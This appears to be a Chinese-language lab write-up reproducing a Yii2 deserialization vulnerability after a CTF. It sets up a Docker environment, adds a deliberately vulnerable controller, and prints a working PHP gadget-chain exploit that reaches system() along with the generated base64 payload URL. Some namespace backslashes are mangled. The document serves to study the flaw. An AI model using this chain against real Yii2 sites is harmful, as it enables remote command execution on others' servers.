Yii2 反序列化漏洞复现
前言
- 之前红帽杯做题时碰到的,当时没细究,现在来本地搭建复现一下
- 原理性的内容就不多说了,本文也只是为了记录一下我复现时候的过程,方便后面复习时用
环境搭建
- 本来想跟着网上大多数人的那种教程一样,直接从
GitHub下载源码,然后docker-compose up安装,但是一直没能成功,后续想尝试着直接Windows上安装,但是过程过于复杂,所以最终还是选择直接docker安装
docker 搭建Yii2环境
- 直接
docker searche yii2
- 我选择的是
schmunk42/yii2-app-basic,然后直接docker pull schmunk42/yii2-app-basic拖取镜像即可
- 启动镜像
docker run -d -P schmunk42/yii2-app-basic
- 访问ip:49153,出现以下界面即搭建完成
漏洞复现
创建一个存在漏洞的Action:/controllers/TestController.php
- 代码如下:
<?php
namespace appcontrollers;
use Yii;
use yiiwebController;
class TestController extends Controller
{
public function actionTest(){
$name = Yii::$app->request->get('unserialize');
return unserialize(base64_decode($name));
}
}
- 利用网上给出的
exp进行复现执行系统命令
<?php
namespace yii
est{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'system';
$this->id = 'ls -al';
}
}
}
namespace Faker{
use yii
estCreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction, 'run'];
}
}
}
namespace yiidb{
use FakerGenerator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yiidbBatchQueryResult));
}
?>
- 利用在线
php代码执行平台运行生成payload
/index.php?r=test/test&unserialize=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ
参考链接
https://xz.aliyun.com/t/8307?page=5https://anquan.baidu.com/article/1260